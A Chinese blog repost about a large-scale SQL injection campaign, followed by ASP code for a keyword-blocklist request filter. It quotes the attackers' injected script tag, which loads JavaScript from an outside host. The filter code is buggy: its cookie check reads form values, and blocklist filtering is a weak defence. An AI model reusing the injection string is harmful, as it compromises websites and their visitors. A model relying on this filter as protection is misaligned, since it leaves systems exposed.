解决大范围SQL注入攻击的问题
来源:互联网 发布:脚本语言javascript 编辑:程序博客网 时间:2024/06/10 00:48
据IDG新闻
受到攻击的服务器数据库表中所有字符字段都被加入“"></"></title><script src=http://s.see9.us/s.js></script><!--“通过查询和参考相关材料,用asp语言整理出以下代码可以解决(其他语言可以按其原理重新编写)上述问题,这段代码有三个特点:
1.用lcase防范大写的sql注入代码
2,分别防范来自Request.QueryString,Request.Form,Request.cookies三个方面的危险
3。直接将代码拷进数据库链接文件,例如asp语言的可以添加到conn文件中。
防范代码如下:(希望更多高手提出意见)
SQL_injdata = "'|exec|insert|select|delete|update|count|iframe|script|chr|mid|master|truncate|char|declare|*|%|and"
SQL_inj = split(SQL_Injdata,"|")
'QueryString请求的注入的拦截
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
Next
End If
'Get请求的注入的拦截
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if
'cookies请求的注入的拦截
If Request.cookies<>"" Then
For Each Sql_Post1 In Request.cookies
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post1)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if
- 解决大范围SQL注入攻击的问题
- 解决ASP防SQL注入攻击程序问题
- 三大措施将SQL注入攻击的危害最小化
- JDBC相关的知识点+大数据处理+防止sql注入攻击
- 如何有效解决企业的SQL注入攻击
- 黑马day10 预编译解决sql的注入攻击&PrepareStatement
- 十大SQL注入攻击工具
- SQL 的注入式攻击
- SQL注入攻击的步骤
- SQL注入攻击的种类
- 简单的SQL注入攻击
- SQL注入攻击的防范
- iBatis解决sql注入问题的方法
- 如何解决sql注入的问题
- 注入攻击--SQL注入
- Sql Server的sql注入攻击
- 著名的SQL流量注入(SQL注入)攻击法
- 著名的SQL流量注入(SQL注入)攻击法
- 亲爱的宝贝,如果你活着,记得我爱你
- 汶川大地震引起最近全国人民心理一定程度的恐慌问题
- 流媒体服务器网上最完全图解
- php中正则表达式使用详解
- 全国哀悼日
- 解决大范围SQL注入攻击的问题
- OD下断点的方法
- Linux-arm开发板与宿主机
- 关于header()函数的使用
- c# Linq 的分页
- 准备开源代码...
- Reporting Services 2005 for the DBA – IIS Security
- 去除迅雷右侧资源信息栏和迅雷广告,以及迅雷的速度限制修改
- native2ascii 编码转换